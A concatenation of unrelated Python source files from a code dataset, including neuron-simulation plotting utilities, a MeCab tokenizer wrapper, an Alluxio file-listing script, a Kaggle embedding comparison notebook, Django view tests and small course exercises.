='Time')\n\n# cell_names is the list of neurons, like \"IC\", \"MN\" etc\n# Assumption 1: The column names in the csv file start with Left_IC, Right_MN, etc and end with cell number\n# Assumption 2: There are no gaps between the columns of the same neuron type and side\ndef readFromCSV(filename, cell_names):\n if filename is None:\n return\n read_data = pd.read_csv(filename)\n\n data_top = list(read_data.columns.values.tolist())\n\n read_sim = np.ascontiguousarray(read_data)\n read_sim = 
np.transpose(read_sim)\n Time = read_sim[0]\n\n LeftValues = dict()\n RightValues = dict()\n for nt in cell_names:\n #find the columns that start with Left_[neuron type name]\n #enumerate adds the indices to data_top: x[0] refers to the index and x[1] refers to the values \n #matchingcols is a list of index and value tuple, which can be reached by [,0] and [,1] respectively\n matchingcols = list(filter(lambda x: x[1].startswith(\"Left_\" + nt), enumerate(data_top)))\n if len(matchingcols) == 0:\n continue\n next_start = matchingcols[0][0]\n next_end = matchingcols[-1][0]\n LeftValues[nt] = read_sim[next_start:next_end+1]\n\n matchingcols = list(filter(lambda x: x[1].startswith(\"Right_\" + nt), enumerate(data_top)))\n if len(matchingcols) == 0:\n continue\n next_start = matchingcols[0][0]\n next_end = matchingcols[-1][0]\n RightValues[nt] = read_sim[next_start:next_end+1]\n\n return Time, LeftValues, RightValues\n\n\n# nMuscle: the number of somites\n# dt: the discretization time\ndef saveAnimation(filename, nMuscle, VLMuscle, VRMuscle, Time, dt):\n\n if filename is None or nMuscle is None or \\\n VLMuscle is None or VRMuscle is None or \\\n Time is None or dt is None:\n return\n\n # Uncomment the line below if ffmpeg.exe is not already in your system environment variable PATH\n # plt.rcParams['animation.ffmpeg_path'] = \"c:/Program Files/ffmpeg/ffmpeg.exe\" #Change if ffmpeg.exe is in another location\n \n # Calculate the number of time points\n nmax = len(Time)\n ani = angles_(Time, nMuscle, nmax, VRMuscle, VLMuscle, dt)\n ani.save(filename) #, fps=30)#, extra_args=['-vcodec', 'libx264'])\n\n\n#This function creates the multipanel animation combining musculoskeletal model with cell firing\n#Assumption: leftValues and rightValues are dictionaries holding the membrane potential values of neurons and muscle cells\n#The key of the dictionary is the type of neuron (\"IC\", \"MN\", etc) or \"Muscle\"\n#colors is the dictionary holding the color\ndef multipanel_anim(Time, nmax, leftValues, rightValues, leftColors, rightColors, dt, imgfile, title):\n \n plt.rc('lines', linewidth=Const.MULTIPANEL_LINEWIDTH) \n # Change default font to Arial\n rcParams['font.sans-serif'] = \"Arial\"\n # Then, \"ALWAYS use sans-serif fonts\"\n rcParams['font.family'] = \"sans-serif\"\n\n rcParams['mathtext.fontset'] = 'custom'\n rcParams['mathtext.bf'] = 'Arial:italic:bold'\n\n figheight = 9\n figwidth = 15\n plotindex_angles = 133 # On a 1x3 image, 3rd position\n plotindex_diagram = 131 # On a 1x3 image, 1st position\n numofcols = 3\n firingplotinc = 2\n\n if (imgfile is None):\n figwidth = 10\n plotindex_angles = 122 # On a 1x2 image, 2nd position\n numofcols = 2\n firingplotinc = 1\n\n # Declare figure and subplot\n fig = plt.figure(figsize=(figwidth, figheight))\n \n fig_angles = fig.add_subplot(plotindex_angles) # musculoskeletal model\n fig_sublist = dict()\n left_firing = dict()\n right_firing = dict()\n\n nMuscle = len(leftValues['Muscle'][:, 0])\n VLMuscle = leftValues['Muscle']\n VRMuscle = rightValues['Muscle']\n numoffiring = len(list(filter(lambda x: x != 'Muscle', dict(leftValues).keys())))\n\n for k in dict(leftValues).keys():\n if k != \"Muscle\":\n figsub = fig.add_subplot(numoffiring, numofcols, firingplotinc)\n firingplotinc += numofcols\n fig_sublist[k] = figsub\n \n #Declare the various left and right traces to be plotted\n firing, = figsub.plot([], [], lw=1, color = leftColors[k])\n left_firing[k] = firing\n firing, = figsub.plot([], [], lw=1, color = rightColors[k])\n right_firing[k] = 
firing\n \n\n fig_angles.set_title(title)\n\n if imgfile is not None:\n # insert double coiling diagram\n fig_diagram = fig.add_subplot(plotindex_diagram)\n img = mpimg.imread(imgfile)\n fig_diagram.imshow(img)\n fig_diagram.axis('off')\n\n Muscle_angles, = fig_angles.plot([], [], 'o-', lw=3, color = 'Black')\n Muscle_angles_highlight, = fig_angles.plot([], [], 'o-', lw=3, color = 'Red')\n\n # Allocating arrays for velocity and position\n vel = np.zeros((nMuscle, nmax))\n pos = np.zeros((nMuscle, nmax))\n \n # Setting constants and initial values for vel. and pos.\n khi = 3.0 #damping cste , high khi =0.5/ low = 0.1\n w0 = 2.5 #2.5 #20Hz = 125.6\n vel0 = 0.0\n pos0 = 0.0\n #Wd = w0\n \n for k in range (0,nMuscle):\n vel[k,0] = vel0 #Sets the initial velocity\n pos[k,0] = pos0 #Sets the initial position\n pos[nMuscle-1,0] = 0.0\n for i in range(1,nmax):\n \n vel[k,i] = -(w0**2)*pos[k,i-1]*dt + vel[k,i-1]*(1-(2*dt*khi*w0)) + 0.1*VRMuscle[k,i-1]*dt - 0.1*VLMuscle[k,i-1]*dt\n pos[k,i] = dt*vel[k,i-1] + pos[k,i-1]\n \n ### DYNAMIC PLOTING\n \n x = np.zeros((nMuscle,nmax))\n y = np.zeros((nMuscle,nmax))\n \n for i in range (0,nmax):\n x[0,i] = 0\n y[0,i] = 0\n pos[0,i] = 0\n for k in range (1,nMuscle):\n pos[k,i] = pos[k-1,i] + pos[k,i]\n \n x[k,i] = x[k-1,i] + np.sin(pos[k,i])\n y[k,i] = y[k-1,i] - np.cos(pos[k,i])\n \n #Declare x and y-axis limits for the various figures\n fig_angles.grid()\n fig_angles.set_ylim(-15, 5)\n fig_angles.set_xlim(-10, 10)\n for k in fig_sublist.keys():\n figsub = fig_sublist[k]\n figsub.set_ylim(-80, 20)\n figsub.set_xlim(0, nmax*dt)\n\n # declare time text\n time_template = 'time = %.1fms'\n time_text = fig_angles.text(0.05, 0.1, '', transform=fig_angles.transAxes)\n fig_angles.legend()\n fig_angles.set_xticks([])\n \n for k in fig_sublist.keys():\n figsub = fig_sublist[k]\n #Set up legend\n leg=figsub.legend(handles=[left_firing[k], right_firing[k]], labels=['L '+ k,'R '+ k], loc='upper right', \n handlelength=Const.MULTIPANEL_LINELENGTH, fontsize=Const.MULTIPANEL_SMALLER_SIZE)\n leg.legendHandles[0].set_color(leftColors[k])\n leg.legendHandles[1].set_color(rightColors[k])\n for line in leg.get_lines():\n line.set_linewidth(Const.MULTIPANEL_LINEWIDTH)\n\n figsub.set_ylabel(r\"$\\mathbf{Vm}$\" + \" (mV)\", fontsize= Const.MULTIPANEL_SMALL_SIZE, fontweight=Const.MULTIPANEL_FONT_STYLE) #y-axis title\n figsub.set_ylim([Const.MULTIPANEL_LOWER_Y, Const.MULTIPANEL_UPPER_Y]) #y-axis limits\n # Remove borders\n figsub.spines['top'].set_visible(False)\n figsub.spines['right'].set_visible(False)\n figsub.spines['bottom'].set_visible(False)\n figsub.spines['left'].set_visible(False)\n #Set up ticks\n figsub.tick_params(axis='both', which='both', length=0) \n for item in ([figsub.title, figsub.xaxis.label, figsub.yaxis.label] +\n figsub.get_xticklabels() + figsub.get_yticklabels()):\n item.set_fontsize(Const.MULTIPANEL_SMALL_SIZE)\n figsub.set_yticks([i*50 + -50 for i in range(0,2)])\n figsub.set_xticks([i*5000 for i in range(0,5)])\n figsub.set_xlabel('Time (ms)', fontsize= Const.MULTIPANEL_SMALL_SIZE, fontweight='bold') #x-axis title\n figsub.set_xlim([Time[0], Time[-1]]) #x-axis limits\n \n #This function initializes the animation\n def init():\n Muscle_angles.set_data([], [])\n for k in left_firing.keys():\n left_firing[k].set_data([], [])\n right_firing[k].set_data([], [])\n time_text.set_text('')\n \n #This function drives the animation by updating every time point\n def animate(i):\n \n thisx = [x[k,i] for k in range(nMuscle)]\n thisy = [y[k,i] for k in 
range(nMuscle)]\n \n Muscle_angles.set_data(thisx, thisy)\n Muscle_angles_highlight.set_data(x[3,i], y[3,i])\n time_text.set_text(time_template % (Time[i]))\n\n for k in left_firing.keys():\n left_firing[k].set_data(Time[0:i], leftValues[k][3, 0:i])\n right_firing[k].set_data(Time[0:i], rightValues[k][3, 0:i])\n\n return Muscle_angles, left_firing, right_firing, time_text\n \n ani = animation.FuncAnimation(fig, animate, np.arange(1, len(Time), 10), \n interval=10, blit=False, init_func=init)\n \n plt.show()\n return ani\n\n#leftValues and rightValues are dictionaries holding membrane potentials of different cell types, multiple cells\n#if onSamePlot = 1: left and right values displayed on the same plot\n#if there is only one neuron type to plot, left will be plotted on the top, right will be plotted on the bottom\n#if there are multiple neuron types to plot, the height is the height for each row\n#colorMode: 0 -> Left and Right colors will be used\n#colorMode: 1 -> Neuron type based colors will be used\ndef plotProgress(tstart, tend, timeArray, leftValues, rightValues, onSamePlot = False, width = 15, height = 5, colorMode = 0):\n\n if dict(leftValues).keys() != dict(rightValues).keys():\n return 0\n \n numofplots = len(dict(leftValues).keys())\n x_axis = timeArray[tstart: tend]\n\n numofrows = numofplots\n numofcols = 1 if onSamePlot else 2\n if numofplots == 1 and not onSamePlot:\n numofrows = 2\n numofcols = 1\n fig, ax = plt.subplots(numofrows, numofcols, sharex=True, figsize=(width, height * numofrows))\n\n rowind = 0\n for k in dict(leftValues).keys():\n\n nCells = len(leftValues[k][:, 0])\n listLeft = leftValues[k]\n listRight = rightValues[k]\n colorLeft = Const.IPSI_COLOR_MAPS[k] if colorMode == 1 else Const.IPSI_COLOR_MAPS['Left']\n colorRight = Const.CONTRA_COLOR_MAPS[k] if colorMode == 1 else Const.CONTRA_COLOR_MAPS['Right']\n\n if numofplots == 1 and onSamePlot:\n ax.plot([0], [0], c=colorLeft(0.5))\n ax.set_title(k)\n for k in range (0, nCells):\n ax.plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax.plot(x_axis, listRight[k,tstart: tend], c=colorRight((k+1)/nCells))\n elif numofplots == 1:\n ax[0].plot([0], [0], c=colorLeft(0.5))\n ax[0].set_title(k)\n for k in range (0, nCells):\n ax[0].plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax[1].plot(x_axis, listRight[k,tstart: tend], c=colorRight((k+1)/nCells))\n elif numofcols == 1:\n ax[0].plot([0], [0], c=colorLeft(0.5))\n ax[rowind].set_title(k)\n for k in range (0, nCells):\n ax[rowind].plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax[rowind].plot(x_axis, listRight[k,tstart: tend], c=colorRight((k+1)/nCells))\n rowind += 1\n else:\n colRight = 0 if onSamePlot else 1\n ax[0, 0].plot([0], [0], c=colorLeft(0.5))\n ax[rowind, 0].set_title(k)\n for k in range (0, nCells):\n ax[rowind, 0].plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax[rowind, colRight].plot(x_axis, listRight[k,tstart: tend], c=colorRight((k+1)/nCells))\n rowind += 1\n \n plt.xlabel('Time (ms)')\n plt.xlim([timeArray[tstart], timeArray[tend] + 1])\n plt.show()\n return fig, ax\n\n#import subprocess #Required to play sound in Mac - uncomment appropriate lines in PlaySound() function\nimport winsound\n\ndef PlaySound():\n #settings for 
Windows\n duration = 1000 # milliseconds\n freq = 440 # Hz\n winsound.Beep(freq, duration)\n #subprocess.call(['afplay', 'Sound.wav']) #Put a wave file of your choice for the sound\n","sub_path":"Zebrafish spinal locomotor circuit/Version 2/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":14699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"110236067","text":"# Main function for classification model\n\nimport sys\nfrom main_utils import argument_parser\nfrom main_utils import load_training_set, load_dev_test_set\nfrom main_utils import show5Results, show1Result, showBestResult, showBest5Result, show5Comparison\nimport os\nfrom classification_model_L2 import classification_8layers_model\nfrom train_evaluate import train_evaluate\nimport numpy as np\nfrom utils import Params\nimport matplotlib.pyplot as plt\n\nargs = argument_parser(sys.argv)\n\nparams = Params(\"../experiments/base_model/params.json\")\n\ntrain_L, train_ab, train_bins, train_grayRGB = load_training_set(args)\ndev_L, dev_ab, dev_bins, dev_grayRGB, test_L, test_ab, test_bins, test_grayRGB = load_dev_test_set(args)\n\n# Weight directory\nmodel_dir = \"./weights_classification\"\nif not os.path.exists(model_dir):\n\tos.mkdir(model_dir)\nbest_path = os.path.join(model_dir, 'best_weights')\nlast_path = os.path.join(model_dir, 'last_weights')\n\n# Build model\ntrain_evaluate = train_evaluate(params, classification_8layers_model)\n\n# Train and predict\nif args.train:\n\tif args.restore:\n\t train_evaluate.train(train_L, train_bins, dev_L, dev_bins, model_dir, last_path)\n\telse:\n\t train_evaluate.train(train_L, train_bins, dev_L, dev_bins, model_dir)\n\nif args.predict:\n save_dir = \"/Users/apple/Desktop/CS230/Project/Report/poster/result/\"\n index = np.array([85, 86, 89, 75, 79])\n X = dev_L[index]\n Y = dev_bins[index]\n show5Comparison(train_evaluate, X, Y, dev_L[index], dev_bins[index], dev_ab[index], last_path, annealed = True, annealed_T = 0.89)\n \n plt.figure()\n index = np.array([74, 70, 65, 69, 63])\n X = dev_L[index]\n Y = dev_bins[index]\n show5Comparison(train_evaluate, X, Y, dev_L[index], dev_bins[index], dev_ab[index], last_path, annealed = True, annealed_T = 0.89, save_dir = None)\n plt.show()\n \n plt.figure()\n index = np.array([36, 20, 17, 5, 4])\n \n X = dev_L[index]\n Y = dev_bins[index]\n show5Comparison(train_evaluate, X, Y, dev_L[index], dev_bins[index], dev_ab[index], last_path, annealed = True, annealed_T = 0.89, save_dir = save_dir)\n \n plt.show()","sub_path":"model/main_classification.py","file_name":"main_classification.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465597279","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport sys, os, platform, re, subprocess\nfrom mecab import utils\nfrom mecab import runmecab\nfrom mecab.viterbi import Viterbi\nfrom mecab.writer import Writer, WordInfo\nfrom .dataloader import getDataLoader\n\nclass MecabSentenceParser:\n def __init__(self):\n self.mecab = runmecab.MecabRunner(\n '%m,%ps,%f[6],%h,%f[7] ', '\\n', '[%m,%ps] ')\n\n def tokenize(self, expr):\n exprFromMecab = self.mecab.run(expr)\n out = []\n for line in exprFromMecab:\n for node in line.split(\" \"):\n if not node:\n break\n m = re.match(\"(.+),(.+),(.+),(.*),(.*)\", node);\n if m is None:\n m = re.match(\"\\[(.+),(.+)\\]\", node)\n if m:\n #raise RuntimeError('unknown node: ' + node)\n word, 
startPos= m.groups(0)\n # word, startPos, dictionaryForm, partOfSpeech, kanaReading\n unicodeTextPos = int(startPos)//2\n out.append(WordInfo(word, unicodeTextPos, word, PoS.UNKNOWN, ''))\n else:\n raise RuntimeError(node)\n else:\n word, startPos, dictionaryForm, partOfSpeech, kanaReading = m.groups(0)\n unicodeTextPos = int(startPos)//2\n out.append(WordInfo(word, unicodeTextPos, dictionaryForm, int(partOfSpeech), kanaReading))\n return out\n\nclass PyPortSentenceParser(object):\n def __init__(self, dataLoader):\n self.mecab = None\n self.viterbi = Viterbi(dataLoader)\n self.writer = Writer()\n\n def tokenize(self, expr):\n path = self.viterbi.getBestPath(expr)\n return self.writer.getWordInfo(self.viterbi.getTokenizer(), path)\n","sub_path":"textproc/sentenceparser.py","file_name":"sentenceparser.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70418286","text":"# -*- coding: utf-8 -*-\n__author__ = 'dujinyuan'\n\nimport commands\nimport pprint\n\n# progress counter\ncount='.'\n# paths to check\ncheckPathA='/rtas_log/service/'\ncheckPathB='/rtas_log/click/'\n# collect the directory listings\nprint(\"Starting Alluxio scan! Collecting file information!\")\na = commands.getoutput('alluxio fs ls '+checkPathA)\nb = commands.getoutput('alluxio fs ls '+checkPathB)\n# wrap the listings into tuples\ntupleE = tuple(a.split(\"\\n\"))\ntupleF = tuple(b.split(\"\\n\"))\n\n'''Find all the files'''\nprint(\"Scanning! \"+\"Folder: \"+checkPathA)\nfile_new = open('data/new.txt','w')\nfile_service = open('data/service_result.txt', 'w')\nfor itemE in tupleE:\n dirName = itemE.split(\" \")[-1]\n e = commands.getoutput('alluxio fs ls '+dirName)\n file_service.writelines(e+\"\\n\")\n file_new.writelines(e.split(\" \")[-1]+\"\\n\") # record the newest file in each subfolder\n count = count+'.'\n print(count)\nfile_service.close()\n\nprint(\"Scanning! \"+\"Folder: \"+checkPathB)\nfile_click = open('data/click_result.txt', 'w')\nfor itemF in tupleF:\n dirName = itemF.split(\" \")[-1]\n e = commands.getoutput('alluxio fs ls '+dirName)\n file_click.writelines(e+\"\\n\")\n file_new.writelines(e.split(\" \")[-1]+\"\\n\") # record the newest file in each subfolder\n count = count+'.'\n print(count)\nfile_click.close()\n\nprint(\"Scan complete!\")\n","sub_path":"alluxioClear/AlluxioDataCheck.py","file_name":"AlluxioDataCheck.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528470586","text":"SUFFIXES = ['KB', 'MB', 'GB', 'TB','PB', 'EB', 'ZB', 'YB']\n\n\ndef approximate_size(size):\n \"\"\"Convert a file size to a human-readable form\n Keyword arguments:\n size -- file size in bytes\n\n Returns: string\n \"\"\"\n multiple = 1024\n for suffix in SUFFIXES:\n size /= multiple\n if size < multiple:\n return '{0:.1f} {1}'.format(size, suffix)\n raise ValueError('number too large')\n\n\nn = int(input())\nans = \"Yes\"\npt = px = py = 0\nfor _ in range(n):\n nt, x, y = map(int, input().split())\n d = abs(x - px) + abs(y - py)\n t = nt - pt\n if d > t or t % 2 != d % 2:\n ans = \"No\"\n pt, px, py = nt, x, y\n\nprint(ans)","sub_path":"abs/abc086c.py","file_name":"abc086c.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591531123","text":"\nimport sys, os, re, csv, codecs, numpy as np, pandas as pd\n\nimport matplotlib.pyplot as plt\n\n### matplotlib inline\n\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation\n\nfrom keras.layers import Bidirectional, GlobalMaxPool1D\n\nfrom keras.models import Model\n\nfrom keras import initializers, regularizers, constraints, optimizers, layers\n\nimport matplotlib.pyplot as plt\n\n### matplotlib inline\n\nimport 
gensim.models.keyedvectors as word2vec\n\nimport gc\ntrain = pd.read_csv('../input/jigsaw-toxic-comment-classification-challenge/train.csv')\n\ntest = pd.read_csv('../input/jigsaw-toxic-comment-classification-challenge/test.csv')\n\nembed_size=0\nlist_classes = [\"toxic\", \"severe_toxic\", \"obscene\", \"threat\", \"insult\", \"identity_hate\"]\n\ny = train[list_classes].values\n\nlist_sentences_train = train[\"comment_text\"]\n\nlist_sentences_test = test[\"comment_text\"]\nmax_features = 20000\n\ntokenizer = Tokenizer(num_words=max_features)\n\ntokenizer.fit_on_texts(list(list_sentences_train))\n\nlist_tokenized_train = tokenizer.texts_to_sequences(list_sentences_train)\n\nlist_tokenized_test = tokenizer.texts_to_sequences(list_sentences_test)\nmaxlen = 200\n\nX_t = pad_sequences(list_tokenized_train, maxlen=maxlen)\n\nX_te = pad_sequences(list_tokenized_test, maxlen=maxlen)\ndef loadEmbeddingMatrix(typeToLoad):\n\n #load different embedding file from Kaggle depending on which embedding \n\n #matrix we are going to experiment with\n\n if(typeToLoad==\"glove\"):\n\n EMBEDDING_FILE='../input/glove-twitter/glove.twitter.27B.25d.txt'\n\n embed_size = 25\n\n elif(typeToLoad==\"word2vec\"):\n\n word2vecDict = word2vec.KeyedVectors.load_word2vec_format(\"../input/googlenewsvectorsnegative300/GoogleNews-vectors-negative300.bin\", binary=True)\n\n embed_size = 300\n\n elif(typeToLoad==\"fasttext\"):\n\n EMBEDDING_FILE='../input/fasttext/wiki.simple.vec'\n\n embed_size = 300\n\n\n\n if(typeToLoad==\"glove\" or typeToLoad==\"fasttext\" ):\n\n embeddings_index = dict()\n\n #Transfer the embedding weights into a dictionary by iterating through every line of the file.\n\n f = open(EMBEDDING_FILE)\n\n for line in f:\n\n #split up line into an indexed array\n\n values = line.split()\n\n #first index is word\n\n word = values[0]\n\n #store the rest of the values in the array as a new array\n\n coefs = np.asarray(values[1:], dtype='float32')\n\n embeddings_index[word] = coefs #50 dimensions\n\n f.close()\n\n print('Loaded %s word vectors.' % len(embeddings_index))\n\n else:\n\n embeddings_index = dict()\n\n for word in word2vecDict.wv.vocab:\n\n embeddings_index[word] = word2vecDict.word_vec(word)\n\n print('Loaded %s word vectors.' % len(embeddings_index))\n\n \n\n gc.collect()\n\n #We get the mean and standard deviation of the embedding weights so that we could maintain the \n\n #same statistics for the rest of our own random generated weights. \n\n all_embs = np.stack(list(embeddings_index.values()))\n\n emb_mean,emb_std = all_embs.mean(), all_embs.std()\n\n \n\n nb_words = len(tokenizer.word_index)\n\n #We are going to set the embedding size to the pretrained dimension as we are replicating it.\n\n #the size will be Number of Words in Vocab X Embedding Size\n\n embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))\n\n gc.collect()\n\n\n\n #With the newly created embedding matrix, we'll fill it up with the words that we have in both \n\n #our own dictionary and loaded pretrained embedding. 
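Each lookup is a plain\n\n #dictionary get; a hypothetical illustration (not part of the original kernel):\n\n # vec = embeddings_index.get('hello') # None when 'hello' is out of vocabulary\n\n # if vec is not None: embedding_matrix[tokenizer.word_index['hello'] - 1] = vec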
\n\n embeddedCount = 0\n\n for word, i in tokenizer.word_index.items():\n\n i-=1\n\n #then we see if this word is in glove's dictionary, if yes, get the corresponding weights\n\n embedding_vector = embeddings_index.get(word)\n\n #and store inside the embedding matrix that we will train later on.\n\n if embedding_vector is not None: \n\n embedding_matrix[i] = embedding_vector\n\n embeddedCount+=1\n\n print('total embedded:',embeddedCount,'common words')\n\n \n\n del(embeddings_index)\n\n gc.collect()\n\n \n\n #finally, return the embedding matrix\n\n return embedding_matrix\n\nembedding_matrix = loadEmbeddingMatrix('word2vec')\nembedding_matrix.shape\ninp = Input(shape=(maxlen, )) #maxlen=200 as defined earlier\nx = Embedding(len(tokenizer.word_index), embedding_matrix.shape[1],weights=[embedding_matrix],trainable=False)(inp)\nx = Bidirectional(LSTM(60, return_sequences=True,name='lstm_layer',dropout=0.1,recurrent_dropout=0.1))(x)\nx = GlobalMaxPool1D()(x)\nx = Dropout(0.1)(x)\nx = Dense(50, activation=\"relu\")(x)\nx = Dropout(0.1)(x)\nx = Dense(6, activation=\"sigmoid\")(x)\nmodel = Model(inputs=inp, outputs=x)\n\nmodel.compile(loss='binary_crossentropy',\n\n optimizer='adam',\n\n metrics=['accuracy'])\nmodel.summary()\n#batch_size = 32\n\n#epochs = 4\n\n#hist = model.fit(X_t,y, batch_size=batch_size, epochs=epochs, validation_split=0.1)\n#loadEmbeddingMatrix('word2vec')\n#loadEmbeddingMatrix('glove') #for GLOVE or\n\n#loadEmbeddingMatrix('fasttext') #for fasttext\nall_losses = {\n\n'word2vec_loss': [0.084318213647104789,\n\n 0.057314205012433353,\n\n 0.051338302593577821,\n\n 0.047672802178572039],\n\n 'word2vec_val_loss': [0.063002561892695971,\n\n 0.057253835496480658,\n\n 0.051085027624451551,\n\n 0.049801279793734249],\n\n'glove_loss': [0.11598931579683543,\n\n 0.088738223480436862,\n\n 0.079895263566000005,\n\n 0.075343037429358703],\n\n 'glove_val_loss': [0.093467933030432285,\n\n 0.080007083813922117,\n\n 0.075349041991106688,\n\n 0.072366507668134517],\n\n 'fasttext_loss': [0.079714499498945865,\n\n 0.056074704045674786,\n\n 0.050703874653286324,\n\n 0.047420131195761134],\n\n 'fasttext_val_loss': [0.058888281775148932,\n\n 0.054906051694414926,\n\n 0.054768857866843601,\n\n 0.050697043558286421],\n\n 'baseline_loss': [0.063304489498915865,\n\n 0.044864004045674786,\n\n 0.039013874651286124,\n\n 0.038630130175761134],\n\n 'baseline_val_loss': [0.048044281075148932,\n\n 0.046414051594414926,\n\n 0.047058757860843601,\n\n 0.047886043558285421]\n\n}\n#f, ax = plt.subplots(1)\n\nepochRange = np.arange(1,5,1)\n\nplt.plot(epochRange,all_losses['word2vec_loss'])\n\nplt.plot(epochRange,all_losses['glove_loss'])\n\nplt.plot(epochRange,all_losses['fasttext_loss'])\n\nplt.plot(epochRange,all_losses['baseline_loss'])\n\nplt.title('Training loss for different embeddings')\n\nplt.ylabel('loss')\n\nplt.xlabel('epoch')\n\nplt.legend(['Word2Vec', 'GLOVE','FastText','Baseline'], loc='upper left')\n\nplt.show()\nepochRange = np.arange(1,5,1)\n\nplt.plot(epochRange,all_losses['baseline_loss'])\n\nplt.plot(epochRange,all_losses['baseline_val_loss'])\n\nplt.title('Training Vs Validation loss for baseline model')\n\nplt.ylabel('loss')\n\nplt.xlabel('epoch')\n\nplt.legend(['Training', 'Validation'], loc='upper left')\n\nplt.show()\nf, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='col', sharey='row',figsize=(20, 20))\n\n\n\nplt.title('Training Vs Validation loss for all 
embeddings')\n\nax1.plot(epochRange,all_losses['baseline_loss'])\n\nax1.plot(epochRange,all_losses['baseline_val_loss'])\n\nax1.set_title('Baseline')\n\nax1.set_ylim(0.03, 0.12)\n\n\n\nax2.plot(epochRange,all_losses['word2vec_loss'])\n\nax2.plot(epochRange,all_losses['word2vec_val_loss'])\n\nax2.set_title('Word2Vec')\n\nax2.set_ylim(0.03, 0.12)\n\n\n\nax3.plot(epochRange,all_losses['glove_loss'])\n\nax3.plot(epochRange,all_losses['glove_val_loss'])\n\nax3.set_title('GLOVE')\n\nax3.set_ylim(0.03, 0.12)\n\n\n\n\n\nax4.plot(epochRange,all_losses['fasttext_loss'])\n\nax4.plot(epochRange,all_losses['fasttext_val_loss'])\n\nax4.set_title('FastText')\n\nax4.set_ylim(0.03, 0.12)\n\n\n\nplt.show()\nwordCount = {'word2vec':66078,'glove':81610,'fasttext':59613,'baseline':210337}\nind = np.arange(0,4,1) # the x locations for the groups\n\nwidth = 0.35 # the width of the bars\n\n\n\nplt.title('Number of common words used in different embeddings')\n\nembNames = list(wordCount.keys())\n\nembVals = list(wordCount.values())\n\nplt.barh(ind,embVals,align='center', height=0.5, color='m',tick_label=embNames)\n\nplt.show()","sub_path":"sources/do-pretrained-embeddings-give-you-the-extra-edge.py","file_name":"do-pretrained-embeddings-give-you-the-extra-edge.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333789760","text":"\"\"\"\nAuthor : Yogaraja Gopal\nThis module is used to test the Infrastructure Related requests\n\"\"\"\nimport unittest\nfrom unittest import mock\nfrom django.test import Client\nfrom .mocked_get_request import mocked_requests_get\nfrom .mocked_post_request import post_mocked_requests\n\n\nclass InfrastructureTestCase(unittest.TestCase):\n \"\"\"\n This Class tests the GET infrastructure api request\n \"\"\"\n # We patch 'requests.get' with our own method. The mock object is passed in to our\n # test case method.\n @mock.patch('delivery_db.abstract.requests.get', side_effect=mocked_requests_get)\n def test_infrastructure_page(self):\n \"\"\"\n This method tests the infrastructure page view\n \"\"\"\n client = Client()\n response = client.get('/esmt/delivery_db/infrastructure/')\n self.assertEqual(response.status_code, 200)\n\n @mock.patch('delivery_db.abstract.requests.get', side_effect=mocked_requests_get)\n def test_get_infra_template(self):\n \"\"\"\n This method tests the get infra template api request\n \"\"\"\n client = Client()\n response = client.get('/api/get_infra/')\n self.assertEqual(response.status_code, 200)\n\n @mock.patch('delivery_db.abstract.requests.get', side_effect=mocked_requests_get)\n def test_add_infra_template(self):\n \"\"\"\n This method tests the add infra add view\n \"\"\"\n client = Client()\n response = client.get('/esmt/delivery_db/infra_template_add/')\n self.assertEqual(response.status_code, 200)\n\n\nclass InfraAddPOSTTestCase(unittest.TestCase):\n \"\"\"\n This Class tests the POST Infrastructure api request\n \"\"\"\n # We patch 'requests.get' with our own method. 
The mock object is passed in to our\n # test case method.\n\n @mock.patch('delivery_db.abstract.requests.post', side_effect=post_mocked_requests)\n def test_post_infra_add(self):\n \"\"\"\n This Class tests the Infrastructure add POST request\n \"\"\"\n client = Client()\n data = {\n \"infra_template_name\": \"Small\",\n \"host_template_description\": \"Standard_DSL1_v2\",\n \"cpu\": 1,\n \"memory_size\": 4,\n \"max_no_disk\": 3,\n \"host_type_id\": 7\n }\n\n response = client.post('/esmt/delivery_db/infra_template_add/', data,\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n","sub_path":"django/scripts/src/esmt/delivery_db/tests/tests_infrastructure.py","file_name":"tests_infrastructure.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585166455","text":"minMonthlyPayment = 0\nbalance = 3329\nannualInterestRate = 0.2\ntempBalance = balance\nwhile balance > 0:\n for i in range(12):\n unpaidBalance = balance - minMonthlyPayment\n interest = unpaidBalance * (annualInterestRate / 12)\n balance = unpaidBalance + interest\n if balance > 0:\n minMonthlyPayment += 10\n balance = tempBalance\n else:\n break\nprint(\"Lowest Payment: \" + str(round(minMonthlyPayment, 2)))","sub_path":"pythonScripts/MIT6.00.1x/unit2/calculateLowestPayment.py","file_name":"calculateLowestPayment.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 